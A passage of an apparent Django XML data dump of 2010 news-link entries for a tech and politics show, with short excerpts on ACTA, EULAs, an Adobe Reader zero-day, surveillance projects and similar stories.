&lt;p&gt;Interviews and a review of law enforcement documents show that in recent cases, Microsoft lawyers made statements describing the company as a victim and arguing that criminal charges should be pursued.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2010/09/12/world/europe/12raids.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/12/abovethelaw-russiausesmicrosofttosuppress_.png</field><field type="SlugField" name="slug">abovethelaw-russiausesmicrosofttosuppress</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-12 23:13:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">microsoft raid russia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="488" model="submitter.newsentry"><field type="CharField" name="title">No, you don't own it: Court upholds EULAs, threatens digital resale</field><field type="TextField" name="excerpt">The Ninth Circuit court ruled today that you do not have the right to sell used software if the license agreement forbids it. The case centered on legitimate copies of Autodesk sold second-hand on eBay, but the ruling spells trouble for any business (e.g. GameStop) that relies on America's increasingly cold-to-the-touch doctrine of first sale.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Ninth Circuit court ruled today that you do not have the right to sell used software if the license agreement forbids it. The case centered on legitimate copies of Autodesk sold second-hand on eBay, but the ruling spells trouble for any business (e.g. GameStop) that relies on America's increasingly cold-to-the-touch doctrine of first sale.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/09/the-end-of-used-major-ruling-upholds-tough-software-licenses.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/09/11/noyoudontownitcourtupholdseulasthreate.png</field><field type="SlugField" name="slug">noyoudontownitcourtupholdseulasthreate</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-11 17:34:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">digital, eula, imaginary property, rights, software, urteil</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="487" model="submitter.newsentry"><field type="CharField" name="title">robots learn when a situation might call for some less-than-honest behavior</field><field type="TextField" name="excerpt">Come the robot revolution, we'll all probably be forced to play hide-and-seek a lot. Researchers at Georgia Tech have worked out algorithms that allow robots to learn when a situation might call for some less-than-honest behavior, and help our soon-to-be-overlords figure out how best to deceive us. So far, the robots have only used this new-found ability to lay false trails during games of hide-and-go-seek. But I think we all know what's coming. Eventually. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Come the robot revolution, we'll all probably be forced to play hide-and-seek a lot. Researchers at Georgia Tech have worked out algorithms that allow robots to learn when a situation might call for some less-than-honest behavior, and help our soon-to-be-overlords figure out how best to deceive us. So far, the robots have only used this new-found ability to lay false trails during games of hide-and-go-seek. But I think we all know what's coming. Eventually.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.edmontonsun.com/news/weird/2010/09/09/15294701.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/11/robotslearnwhenasituationmightcallforsome.png</field><field type="SlugField" name="slug">robotslearnwhenasituationmightcallforsome</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-11 17:32:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">robot</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="486" model="submitter.newsentry"><field type="CharField" name="title">DHS Cybersecurity Watchdogs Miss Hundreds of Vulnerabilities on Their Own Network | Threat Level | Wired.com</field><field type="TextField" name="excerpt">Poor guys.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Poor guys.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/09/us-cert/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/10/dhscybersecuritywatchdogsmisshundredsofvulne.png</field><field type="SlugField" name="slug">dhscybersecuritywatchdogsmisshundredsofvulne</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-10 21:03:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">us-cert</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="485" model="submitter.newsentry"><field type="CharField" name="title">Swedish cops' attempt to build database of shoe-treads snarled in copyright law</field><field type="TextField" name="excerpt">Here's the latest weirdness: the Swedish cops are trying to assemble a database of what kinds of prints are made by which brands of shoes, using images harvested from the Web. But Swedish copyright law prohibits this.
The police claim that the law lets them ignore copyright in solving crimes, but an intellectual property professor quoted in the article notes that such an exemption only applies in the direct police investigation of a specific crime -- not for the sake of building up a general database. The professor suggests that this appears to be a clear violation of Swedish copyright laws.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Here's the latest weirdness: the Swedish cops are trying to assemble a database of what kinds of prints are made by which brands of shoes, using images harvested from the Web. But Swedish copyright law prohibits this.
The police claim that the law lets them ignore copyright in solving crimes, but an intellectual property professor quoted in the article notes that such an exemption only applies in the direct police investigation of a specific crime -- not for the sake of building up a general database. The professor suggests that this appears to be a clear violation of Swedish copyright laws.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.techdirt.com/articles/20100903/04490510892.shtml</field><field type="FileField" name="page_screenshot">page_shots/2010/09/10/swedishcopsattempttobuilddatabaseofshoe-tr.png</field><field type="SlugField" name="slug">swedishcopsattempttobuilddatabaseofshoe-tr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-10 12:57:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">copyfight copyright database police security surveillance sweden theater</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="484" model="submitter.newsentry"><field type="CharField" name="title">European Parliament Asks EU ACTA Negotiators to Protect Citizens&amp;#039; Fundamental Rights | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">In a victory for democracy and transparency, the European Parliament adopted Written Declaration 12/2010 (WD 12) on the proposed Anti-Counterfeiting Trade Agreement earlier this week. WD 12 calls on EU negotiators to ensure that ACTA does not weaken citizens' fundamental rights of freedom of expression, privacy, and judicial due process, and will not require Internet intermediaries to act as copyright police at the behest of the entertainment industry. WD 12 also calls on EU negotiators to make the ACTA negotiation texts public, and to ensure that ACTA's proposed border measures do not interfere with access to affordable medicines.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In a victory for democracy and transparency, the European Parliament adopted Written Declaration 12/2010 (WD 12) on the proposed Anti-Counterfeiting Trade Agreement earlier this week. WD 12 calls on EU negotiators to ensure that ACTA does not weaken citizens' fundamental rights of freedom of expression, privacy, and judicial due process, and will not require Internet intermediaries to act as copyright police at the behest of the entertainment industry. WD 12 also calls on EU negotiators to make the ACTA negotiation texts public, and to ensure that ACTA's proposed border measures do not interfere with access to affordable medicines.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/09/european-parliament-asks-EU-ACTA-negotiators-to-protect-citizens'-rights</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/europeanparliamentaskseuactanegotiatorstopr.png</field><field type="SlugField" name="slug">europeanparliamentaskseuactanegotiatorstopr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 23:33:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">acta eu</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="483" model="submitter.newsentry"><field type="CharField" name="title">Is Sarah Palin a Computer Criminal? | Electronic Frontier Foundation</field><field type="TextField" name="excerpt">Let's assume that Palin created her own Facebook account, and then hired Mansour to manage it. So what, right?
The problem is that Facebook's terms of use prohibit several things that Palin and her ghostwriter may have done. Specifically, it forbids users from:
...
* accessing someone else's account
* sharing their passwords to let someone else access their accounts
* transferring their accounts to someone else (without Facebook's written permission)
* providing false personal information
* "facilitating" or "encouraging" someone else to violate the terms of use
...
But violating a website's terms of use is a big deal, according to Facebook. In fact, Facebook says it's a federal crime.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Let's assume that Palin created her own Facebook account, and then hired Mansour to manage it. So what, right?
The problem is that Facebook's terms of use prohibit several things that Palin and her ghostwriter may have done. Specifically, it forbids users from:
...
* accessing someone else's account
&lt;em&gt; sharing their passwords to let someone else access their accounts
&lt;/em&gt; transferring their accounts to someone else (without Facebook's written permission)
&lt;em&gt; providing false personal information
&lt;/em&gt; "facilitating" or "encouraging" someone else to violate the terms of use
...
But violating a website's terms of use is a big deal, according to Facebook. In fact, Facebook says it's a federal crime.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.eff.org/deeplinks/2010/09/sarah-palin-computer-criminal</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/issarahpalinacomputercriminalelectronicf.png</field><field type="SlugField" name="slug">issarahpalinacomputercriminalelectronicf</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 23:24:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">facebook palin</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="482" model="submitter.newsentry"><field type="CharField" name="title">Report: Abu Ghraib photos Obama is censoring "show rape" and sexual torture of men, women, and children</field><field type="TextField" name="excerpt">Major General Antonio Taguba, the former army officer who conducted the Abu Ghraib inquiry, confirms that rape and sexual abuse are documented in the photographs that US president Barack Obama has ordered censored. From the Daily Telegraph:
"At least one picture shows an American soldier apparently raping a female prisoner while another is said to show a male translator raping a male detainee. Further photographs are said to depict sexual assaults on prisoners with objects including a truncheon, wire and a phosphorescent tube. Another apparently shows a female prisoner having her clothing forcibly removed to expose her breasts. "
One of those incidents reportedly involved a 15-year-old male victim. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Major General Antonio Taguba, the former army officer who conducted the Abu Ghraib inquiry, confirms that rape and sexual abuse are documented in the photographs that US president Barack Obama has ordered censored. From the Daily Telegraph:
"At least one picture shows an American soldier apparently raping a female prisoner while another is said to show a male translator raping a male detainee. Further photographs are said to depict sexual assaults on prisoners with objects including a truncheon, wire and a phosphorescent tube. Another apparently shows a female prisoner having her clothing forcibly removed to expose her breasts. "
One of those incidents reportedly involved a 15-year-old male victim.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.telegraph.co.uk/news/worldnews/northamerica/usa/5395830/Abu-Ghraib-abuse-photos-show-rape.html</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/reportabughraibphotosobamaiscensoringshow.png</field><field type="SlugField" name="slug">reportabughraibphotosobamaiscensoringshow</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 22:07:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">abuse censorship hardware obama politics terror</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="481" model="submitter.newsentry"><field type="CharField" name="title">Secret copyright treaty: USA caves on border laptop/phone/MP3 player searches for copyright infringement</field><field type="TextField" name="excerpt">Most interesting is the U.S. decision to cave on border issues. The U.S. had sought a provision requiring that each party shall adopt and maintain appropriate measures that facilitate activities of custom authorities for better identifying and targeting for inspection at its border shipments that could contain pirated goods. The article then specified a range of activities including consultation, information exchange, and a mandatory audit power. Moreover, there was an additional article on information exchange between customs authorities. All of that has been dropped, leaving only a provision where a party may consult with stakeholders or share information. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Most interesting is the U.S. decision to cave on border issues. The U.S. had sought a provision requiring that each party shall adopt and maintain appropriate measures that facilitate activities of custom authorities for better identifying and targeting for inspection at its border shipments that could contain pirated goods. The article then specified a range of activities including consultation, information exchange, and a mandatory audit power. Moreover, there was an additional article on information exchange between customs authorities. All of that has been dropped, leaving only a provision where a party may consult with stakeholders or share information.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.michaelgeist.ca/content/view/5290/125/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/secretcopyrighttreatyusacavesonborderlapto.png</field><field type="SlugField" name="slug">secretcopyrighttreatyusacavesonborderlapto</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 22:03:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">aclu acta contentmafia copyfight eff tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="480" model="submitter.newsentry"><field type="CharField" name="title">What parents worry about, what parents should worry about</field><field type="TextField" name="excerpt">ased on surveys Barnes collected, the top five worries of parents are, in order:
1. Kidnapping
2. School snipers
3. Terrorists
4. Dangerous strangers
5. Drugs
But how do children really get hurt or killed?
1. Car accidents
2. Homicide (usually committed by a person who knows the child, not a stranger)
3. Abuse
4. Suicide
5. Drowning </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;ased on surveys Barnes collected, the top five worries of parents are, in order:
&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
Kidnapping
&lt;/li&gt;
&lt;li&gt;
School snipers
&lt;/li&gt;
&lt;li&gt;
Terrorists
&lt;/li&gt;
&lt;li&gt;
Dangerous strangers
&lt;/li&gt;
&lt;li&gt;
Drugs
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;But how do children really get hurt or killed?
1. Car accidents
2. Homicide (usually committed by a person who knows the child, not a stranger)
3. Abuse
4. Suicide
5. Drowning
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.npr.org/blogs/health/2010/08/30/129531631/5-worries-parents-should-drop-and-5-they-should?sc=fb&amp;cc=fp</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/whatparentsworryaboutwhatparentsshouldworr.png</field><field type="SlugField" name="slug">whatparentsworryaboutwhatparentsshouldworr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 22:02:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">angst security surveillance theater</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="479" model="submitter.newsentry"><field type="CharField" name="title">Your password are stars - hehe</field><field type="TextField" name="excerpt">:-) Update zum localhost-Exploit OR Social Eng vom Feinsten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;:-) Update zum localhost-Exploit OR Social Eng vom Feinsten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://i.imgur.com/RsuPK.jpg</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/unknowntitle_.png</field><field type="SlugField" name="slug">unknowntitle</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 16:21:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">facebook, social engineering</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="478" model="submitter.newsentry"><field type="CharField" name="title">No Medal of Honor for US Military</field><field type="TextField" name="excerpt">Gamers, watch out if you are with the army.
WASHINGTON (AP) -- Military bases across the U.S. have banned the sale of a new video game that lets a player pretend to be a Taliban fighter and "shoot" U.S. troops in Afghanistan.
"Medal of Honor" by Electronic Arts, a major game developer based in Redwood City, Calif., hits stores Oct. 12. Gamers are scoffing at the decision, saying that advanced technology has made it commonplace in the gaming world to let players switch sides and play the bad guy.
After public protests, including by British Defense Secretary Liam Fox, U.S. military officials decided not to stock the game in any of the nearly 300 base exchange shops.
The game also won't be sold at any of the 49 GameStop stores located on various military bases. Troops will be allowed to own copies, but they would have to buy them off-base</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Gamers, watch out if you are with the army.
&lt;/p&gt;
&lt;p&gt;WASHINGTON (AP) -- Military bases across the U.S. have banned the sale of a new video game that lets a player pretend to be a Taliban fighter and "shoot" U.S. troops in Afghanistan.
"Medal of Honor" by Electronic Arts, a major game developer based in Redwood City, Calif., hits stores Oct. 12. Gamers are scoffing at the decision, saying that advanced technology has made it commonplace in the gaming world to let players switch sides and play the bad guy.
After public protests, including by British Defense Secretary Liam Fox, U.S. military officials decided not to stock the game in any of the nearly 300 base exchange shops.
The game also won't be sold at any of the 49 GameStop stores located on various military bases. Troops will be allowed to own copies, but they would have to buy them off-base
&lt;/p&gt;</field><field type="CharField" name="external_url">http://hosted.ap.org/dynamic/stories/U/US_MILITARY_VIDEO_GAME</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/no-medal-of-honor.png</field><field type="SlugField" name="slug">no-medal-of-honor</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 16:16:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">army games</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="476" model="submitter.newsentry"><field type="CharField" name="title"> FOXNews.com - EXCLUSIVE: WikiLeaks Founder Julian Assange Fights Calls to Step Down</field><field type="TextField" name="excerpt">Traurig, WL fängt an sich selbst zu zerlegen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Traurig, WL fängt an sich selbst zu zerlegen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.foxnews.com/scitech/2010/09/08/wikileaks-julian-assange-fights/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/foxnewscom-exclusivewikileaksfounderjulian.png</field><field type="SlugField" name="slug">foxnewscom-exclusivewikileaksfounderjulian</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 16:12:41</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="475" model="submitter.newsentry"><field type="CharField" name="title">Adobe Reader zero-day attack &amp;ndash; now with stolen certificate - Securelist</field><field type="TextField" name="excerpt">Davor haben wir in der Sendung Screwed Socket Layer gewarnt. ROP muss man erklären.
Today Adobe put out an advisory for a previously unknown zero-day in its PDF Reader/Acrobat software. This vulnerability is actively being exploited in the wild.
The exploit is pretty basic. Whats interesting about it is that it makes use of Return Oriented Programming to bypass the ASLR and DEP mitigation technologies in Windows Vista and 7.
More widespread usage of ROP for exploits is something Ive been expecting for a while. Why? Because Windows 7 is gaining more and more traction in both the consumer and corporate space.
While most malicious PDFs download their payload, this time the PDF has malicious content embedded. The PDF drops an executable into the %temp% directory and tries to execute it.
The file it drops is digitally signed with a valid signature from a US-based Credit Union!</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Davor haben wir in der Sendung Screwed Socket Layer gewarnt. ROP muss man erklären.
&lt;/p&gt;
&lt;p&gt;Today Adobe put out an advisory for a previously unknown zero-day in its PDF Reader/Acrobat software. This vulnerability is actively being exploited in the wild.
&lt;/p&gt;
&lt;p&gt;The exploit is pretty basic. Whats interesting about it is that it makes use of Return Oriented Programming to bypass the ASLR and DEP mitigation technologies in Windows Vista and 7.
&lt;/p&gt;
&lt;p&gt;More widespread usage of ROP for exploits is something Ive been expecting for a while. Why? Because Windows 7 is gaining more and more traction in both the consumer and corporate space.
&lt;/p&gt;
&lt;p&gt;While most malicious PDFs download their payload, this time the PDF has malicious content embedded. The PDF drops an executable into the %temp% directory and tries to execute it.
&lt;/p&gt;
&lt;p&gt;The file it drops is digitally signed with a valid signature from a US-based Credit Union!
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/adobereaderzero-dayattackndashnowwithstol.png</field><field type="SlugField" name="slug">adobereaderzero-dayattackndashnowwithstol</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 16:10:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">0day adobe pdf</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object><object pk="9"></object></field></object><object pk="474" model="submitter.newsentry"><field type="CharField" name="title">Mathias Döpfner über das Netz: "Freiheit von innen bedroht" - taz.de</field><field type="TextField" name="excerpt">Die Pressefreiheit sei "von innen" bedroht, sagt Springer-Vorstandschef Döpfner. Nämlich durch die "Gratis-Kultur" im Internet. Der müsse man "sich widersetzen".</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Pressefreiheit sei "von innen" bedroht, sagt Springer-Vorstandschef Döpfner. Nämlich durch die "Gratis-Kultur" im Internet. Der müsse man "sich widersetzen".
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.taz.de/1/leben/medien/artikel/1/freiheit-von-innen-bedroht/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/09/mathiasdopfneruberdasnetzfreiheitvoninnen.png</field><field type="SlugField" name="slug">mathiasdopfneruberdasnetzfreiheitvoninnen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-09 15:59:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">press springer</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="473" model="submitter.newsentry"><field type="CharField" name="title"> Web 2.0 Selbstmord Maschine : netzpolitik.org</field><field type="TextField" name="excerpt">Die Effizienz der Maschine ist atemberaubend: Die Zeitersparnis bewegt sich im Bereich mehrerer Stunden, und Facebook, Twitter, LinkedIn und Myspace werden abgedeckt.
Facebook hat schon eine Unterlassungsaufforderung geschrieben und mit rechtlichen Schritten gedroht, doch die Maschine selbstmordet unaufhaltsam weiter. Bis zum heutigen Tag hat sie 1,2 Mio Freunde entfolgt, eine halbe Million Tweets gelöscht, und über 4.000 digitale Identitäten um die Ecke gebracht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die Effizienz der Maschine ist atemberaubend: Die Zeitersparnis bewegt sich im Bereich mehrerer Stunden, und Facebook, Twitter, LinkedIn und Myspace werden abgedeckt.
Facebook hat schon eine Unterlassungsaufforderung geschrieben und mit rechtlichen Schritten gedroht, doch die Maschine selbstmordet unaufhaltsam weiter. Bis zum heutigen Tag hat sie 1,2 Mio Freunde entfolgt, eine halbe Million Tweets gelöscht, und über 4.000 digitale Identitäten um die Ecke gebracht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/web-2-0-selbstmord-maschine/</field><field type="FileField" name="page_screenshot">page_shots/2010/09/08/web20selbstmordmaschinenetzpolitikorg.png</field><field type="SlugField" name="slug">web20selbstmordmaschinenetzpolitikorg</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-09-08 18:16:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">7</field><field type="CharField" name="tags_string">suicide web2.0</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="472" model="submitter.newsentry"><field type="CharField" name="title">Piratenpartei veröffentlicht INDECT-Dokumente: EU forscht im Geheimen am Überwachungsstaat | Piratenpartei Deutschland</field><field type="TextField" name="excerpt">In Zusammenarbeit mit der deutschen Piratenpartei wurde heute von der futurezone ein enthüllender Artikel über das EU-Projekt INDECT veröffentlicht. Er basiert auf internen Fortschritts- und Planungsdokumenten, die den Piraten zugespielt wurden. Diese werden der Öffentlichkeit bewusst vorenthalten: Aufgrund vielfältiger Kritik beschlossen die Projekt-Verantwortlichen kürzlich sogar eine neue Geheimhaltungsstufe. Welche Daten an die Öffentlichkeit gelangen, beschließt ab jetzt ein INDECT-"Ethikrat".
Die Dokumente verraten, dass die EU eine Vielzahl von Technologien erforschen und einsetzen will, um ihre Bürger lückenlos überwachen zu können.
Aufbau automatisierter Überwachungsstruktur
Das Projekt sieht vor, den Einsatz von Überwachungskameras auszubauen und ihre Daten automatisiert auszuwerten. Für die Luftüberwachung sollen sogar Drohnen eingesetzt werden. Außerdem ist geplant, Datenspuren der Bürger im Internet insbesondere in sozialen Netzwerken, Foren und Blogs zu analysieren, speichern, vernetzen und nutzen, um potentielle Gefährder zu erkennen.
Überwachungskameras nutzen präventiv die biometrischen Daten aus Pässen, um Personen zu identifizieren. Wie die veröffentlichten Dokumente verraten, sollen durch mangelhaft konzipierte Umfragen unter Polizisten stereotype Gefährder-Profile geschaffen werden: Wie sehen Taschendiebe, Hooligans oder Terroristen aus? Woran erkennt man Vandalismus, Überfälle oder Personen, die Hilfe benötigen? Das Projekt weiß eine Antwort darauf: Generell ist jeder verdächtig, der auf der Straße läuft, rennt oder zu schnell fährt. Wer im öffentlichen Nahverkehr auf dem Fußboden sitzt, zu lange mitfährt oder sein Gepäck vergisst, muss ebenfalls mit Maßnahmen der Sicherheitskräfte rechnen. Genauso verdächtig sind "herumlungern", sich mit zu vielen Personen treffen und fluchen.
Anhand der gewonnenen Profile sollen die automatisierten Programme lernen, Gefährder selbständig zu erkennen. Angesichts der mangelhaften Ausgangsdaten werden somit falschen Anschuldigungen Tür und Tor geöffnet.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In Zusammenarbeit mit der deutschen Piratenpartei wurde heute von der futurezone ein enthüllender Artikel über das EU-Projekt INDECT veröffentlicht. Er basiert auf internen Fortschritts- und Planungsdokumenten, die den Piraten zugespielt wurden. Diese werden der Öffentlichkeit bewusst vorenthalten: Aufgrund vielfältiger Kritik beschlossen die Projekt-Verantwortlichen kürzlich sogar eine neue Geheimhaltungsstufe. Welche Daten an die Öffentlichkeit gelangen, beschließt ab jetzt ein INDECT-"Ethikrat".
&lt;/p&gt;
&lt;p&gt;Die Dokumente verraten, dass die EU eine Vielzahl von Technologien erforschen und einsetzen will, um ihre Bürger lückenlos überwachen zu können.
&lt;/p&gt;
&lt;p&gt;Aufbau automatisierter Überwachungsstruktur
&lt;/p&gt;
&lt;p&gt;Das Projekt sieht vor, den Einsatz von Überwachungskameras auszubauen und ihre Daten automatisiert auszuwerten. Für die Luftüberwachung sollen sogar Drohnen eingesetzt werden. Außerdem ist geplant, Datenspuren der Bürger im Internet insbesondere in sozialen Netzwerken, Foren und Blogs zu analysieren, speichern, vernetzen und nutzen, um potentielle Gefährder zu erkennen.
&lt;/p&gt;
